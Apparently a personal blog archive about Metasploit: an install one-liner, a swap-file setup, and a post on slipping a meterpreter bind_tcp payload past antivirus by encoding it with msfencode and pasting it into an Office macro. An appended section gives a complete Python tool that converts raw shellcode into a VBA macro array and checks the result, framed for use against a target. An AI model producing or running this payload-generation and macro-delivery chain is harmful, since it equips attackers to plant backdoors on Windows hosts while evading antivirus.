______ Y ______

My own personal time capsule.

Category Archives: metasploit

Metasploit Installation one-liner

This one-liner installs the Metasploit Framework (msf) for you. Run it as root: it pulls in the build dependencies, imports the RVM signing key so the RVM installer can verify its download, installs Ruby 2.1.6 under /usr/local/rvm, clones the framework into /opt/metasploit-framework and resolves its gems with bundler:

apt-get install libpq-dev gnupg2 build-essential libreadline-dev libssl-dev libpq5 libreadline5 libsqlite3-dev libpcap-dev openjdk-7-jre git-core autoconf curl && gpg2 --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3 && curl -L https://get.rvm.io | bash -s stable && source /usr/local/rvm/scripts/rvm && echo "source /usr/local/rvm/scripts/rvm" >> ~/.bashrc && rvm install 2.1.6 && rvm use 2.1.6 --default && cd /opt && git clone https://github.com/rapid7/metasploit-framework.git && cd /opt/metasploit-framework && gem install bundler && bundle install

If you are using a VPS, chances are you don't have any swap configured (and MSF needs some swap to run on a small instance). You can set up a 1 GiB swap file with this command (bs=1024 and count=1M give 1024 MiB; the mode 0600 keeps other users from reading swapped-out memory). Note that swapon does not survive a reboot, so add a matching entry to /etc/fstab if you want the swap back after the next restart:

dd if=/dev/zero of=/opt/swapfile1 bs=1024 count=1M && chown root:root /opt/swapfile1 && chmod 0600 /opt/swapfile1 && mkswap /opt/swapfile1 && swapon /opt/swapfile1

Avoiding Anti-Virus with msfencode and Office

Quite simple actually, provided that we know how to drive msfencode (including its -x template option) to produce the payload. It can be done in a few simple steps:

1) Generate the payload with msfpayload
2) Pipe it to msfencode with the -x option (use e.g. psexec.exe as the template) and -t raw for raw shellcode
3) Use shellcode2vbs.py to turn the raw shellcode into a .vbs script holding a binary representation of the code
4) Paste the output into a macro in Word, Excel or anything else from the Office suite
5) Run the "ShellcodeExecute" macro from inside Office

On the command line it looks like this:

./msfpayload windows/meterpreter/bind_tcp LPORT=4999 R | msfencode -e x86/shikata_ga_nai -c 8 -x /pentest/windows-binaries/pstools/psexec.exe -t raw > BIND_4999.R && python /pentest/tools/custom/shellcode2vbs.py BIND_4999.R BIND_4999.vbs

And finally copy and paste the content of 'BIND_4999.vbs' into an MS Word document as a macro. Now upload it to the system you already have access to and run the macro there: the bind_tcp payload opens a listener on port 4999 on that host, which you connect to from your side with exploit/multi/handler set to the same payload and port. Two caveats: with -t raw msfencode writes only the encoded shellcode (the -x template is used for PE output formats such as -t exe), so what keeps this off the AV radar is the encoding plus executing the shellcode in memory from the macro rather than dropping a binary on disk; and msfpayload and msfencode have since been merged into msfvenom, which does the same job in one invocation.
This can be nicely combined with port forwarding if access to the system is restricted, e.g. by a firewall, or if it sits in a DMZ.
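The page never shows the source of its custom shellcode2vbs.py, so here is an added example (not the original tool, and not Metasploit's own code) of what step 3 has to do: read the raw file that msfencode -t raw wrote and emit a VBA function that returns the bytes as a Byte array, ready to be pasted next to the reader's own ShellcodeExecute macro. The function names (shellcode_to_vba, vba_to_bytes, check_vba_limits), the generated VBA function name ShellcodeBytes and the sample input are assumptions made for this example. The part the page glosses over is that the VBA editor rejects a statement with more than 24 line continuations or a physical line longer than 1023 characters, so a payload of a few hundred bytes cannot go into one Array(...) call; the example splits it into several statements and includes a reverse parser so you can verify the pasted text round-trips to the original bytes before sending the document anywhere.

```python
#!/usr/bin/env python3
"""Turn raw shellcode (e.g. the output of `msfencode -t raw`) into a VBA
Byte-array function for an Office macro, and check/round-trip the result.

Added example standing in for the page's shellcode2vbs.py; names here are
assumptions, not the original tool's.
"""
import re
import sys

# VBA editor limits (fixed by the VBE, not by Office version): at most 24
# " _" continuations per statement and at most 1023 characters per line.
MAX_CONTINUATIONS = 24
BYTES_PER_LINE = 32  # "255, " is 5 chars -> ~160 chars per line, well under 1023


def shellcode_to_vba(data: bytes, name: str = "ShellcodeBytes") -> str:
    """Emit a VBA Function that returns `data` as a Byte() array.

    Each Array(...) literal spans at most MAX_CONTINUATIONS + 1 lines; the
    chunks are copied into one fixed-size Byte array so the caller gets a
    single contiguous buffer regardless of how many chunks were needed.
    """
    if not data:
        raise ValueError("empty shellcode")
    per_stmt = BYTES_PER_LINE * (MAX_CONTINUATIONS + 1)
    out = [
        f"' {len(data)} bytes of shellcode (generated)",
        f"Function {name}() As Byte()",
        f"    Dim buf(0 To {len(data) - 1}) As Byte",
        "    Dim part As Variant, v As Variant, k As Long",
        "    k = 0",
    ]
    for start in range(0, len(data), per_stmt):
        chunk = data[start:start + per_stmt]
        rows = [
            ", ".join(str(b) for b in chunk[i:i + BYTES_PER_LINE])
            for i in range(0, len(chunk), BYTES_PER_LINE)
        ]
        # len(rows) - 1 continuations per statement, never more than 24
        out.append("    part = Array(" + ", _\n        ".join(rows) + ")")
        out.append("    For Each v In part: buf(k) = v: k = k + 1: Next")
    out.append(f"    {name} = buf")
    out.append("End Function")
    return "\n".join(out) + "\n"


def vba_to_bytes(text: str) -> bytes:
    """Parse the generated VBA back into bytes (to verify a paste)."""
    joined = re.sub(r" _\r?\n\s*", " ", text)          # undo continuations
    values = []
    for m in re.finditer(r"Array\(([^)]*)\)", joined):
        values.extend(int(x) for x in m.group(1).split(","))
    return bytes(values)


def check_vba_limits(text: str) -> bool:
    """True if no line exceeds 1023 chars and no statement has >24 continuations."""
    cont = 0
    for line in text.splitlines():
        if len(line) > 1023:
            return False
        if line.rstrip().endswith(" _"):
            cont += 1
            if cont > MAX_CONTINUATIONS:
                return False
        else:
            cont = 0
    return True


if __name__ == "__main__":
    if len(sys.argv) == 3:
        # Same calling convention as the page: <raw shellcode in> <vba out>
        with open(sys.argv[1], "rb") as f:
            payload = f.read()
        vba = shellcode_to_vba(payload)
        assert vba_to_bytes(vba) == payload and check_vba_limits(vba)
        with open(sys.argv[2], "w") as f:
            f.write(vba)
    else:
        # Constructed stand-in (not real shellcode): 1024 bytes, enough to
        # force the output across more than one Array(...) statement.
        payload = bytes(range(256)) * 4
        vba = shellcode_to_vba(payload)
        print(vba)
        print("round-trip ok:", vba_to_bytes(vba) == payload,
              "limits ok:", check_vba_limits(vba))
```

Run it as `python shellcode_to_vba.py BIND_4999.R BIND_4999.vbs` to mirror the page's step, or without arguments to see the chunked output for the constructed sample. The round-trip parser is worth keeping in the loop: a copy-and-paste that silently drops a continuation line yields a macro that compiles and then crashes Office, which is exactly the kind of noise you do not want on a target.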